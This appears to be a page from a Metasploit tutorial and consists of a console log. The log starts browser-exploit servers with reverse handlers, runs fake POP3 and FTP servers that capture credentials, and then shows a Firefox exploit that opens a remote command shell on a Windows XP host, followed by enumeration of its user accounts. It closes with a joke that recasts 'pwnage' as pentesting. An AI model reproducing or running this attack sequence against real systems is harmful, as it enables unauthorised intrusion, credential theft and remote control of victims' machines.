[*] Using URL: http://0.0.0.0:55550/exploit/windows/browser/novelliprint_getdriversettings
[*] Local IP: http://127.0.0.1:55550/exploit/windows/browser/novelliprint_getdriversettings
[*] Server started.
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:55550/exploit/windows/browser/ms03_020_ie_objecttype
[*] Local IP: http://127.0.0.1:55550/exploit/windows/browser/ms03_020_ie_objecttype
[*] Server started.
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:55550/exploit/windows/browser/ie_createobject
[*] Local IP: http://127.0.0.1:55550/exploit/windows/browser/ie_createobject
[*] Server started.
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:55550/exploit/windows/browser/ms06_067_keyframe
[*] Local IP: http://127.0.0.1:55550/exploit/windows/browser/ms06_067_keyframe
[*] Server started.
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:55550/exploit/windows/browser/ms06_071_xml_core
[*] Local IP: http://127.0.0.1:55550/exploit/windows/browser/ms06_071_xml_core
[*] Server started.
[*] Started reverse handler
[*] Server started.
[*] Using URL: http://0.0.0.0:55550/ads
[*] Local IP: http://127.0.0.1:55550/ads
[*] Server started.
[*] Auxiliary module running as background job
resource> use auxiliary/server/capture/pop3
resource> set SRVPORT 110
SRVPORT => 110
resource> set SSL false
SSL => false
resource> run
[*] Server started.
[*] Auxiliary module running as background job
resource> use auxiliary/server/capture/pop3
resource> set SRVPORT 995
SRVPORT => 995
resource> set SSL true
SSL => true
resource> run
[*] Server started.
[*] Auxiliary module running as background job
resource> use auxiliary/server/capture/ftp
resource> run
[*] Server started.
...
...
[*] Sending Firefox location.QueryInterface() Code Execution to 10.0.0.252:1493...
[*] Command shell session 2 opened (10.0.0.1:45001 -> 10.0.0.252:1507)
msf auxiliary(http) > sessions -i 2
[*] Starting interaction with 2...
Microsoft Windows XP [Vesion 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
D:Mozilla Firefox> cd ..
D:net user
User accounts for CWH
-------------------------------------------------------------------------------
__vmware_user__ Administrator ASPNET
Guest HelpAssistant IUSR_CWH
IWAM_CWH CWH SUPPORT_388945a0
The command completed successfully.
Enjoy for Pwnage !!. Oops, For pentest :p
11 of 12 12/24/10 5:48 PM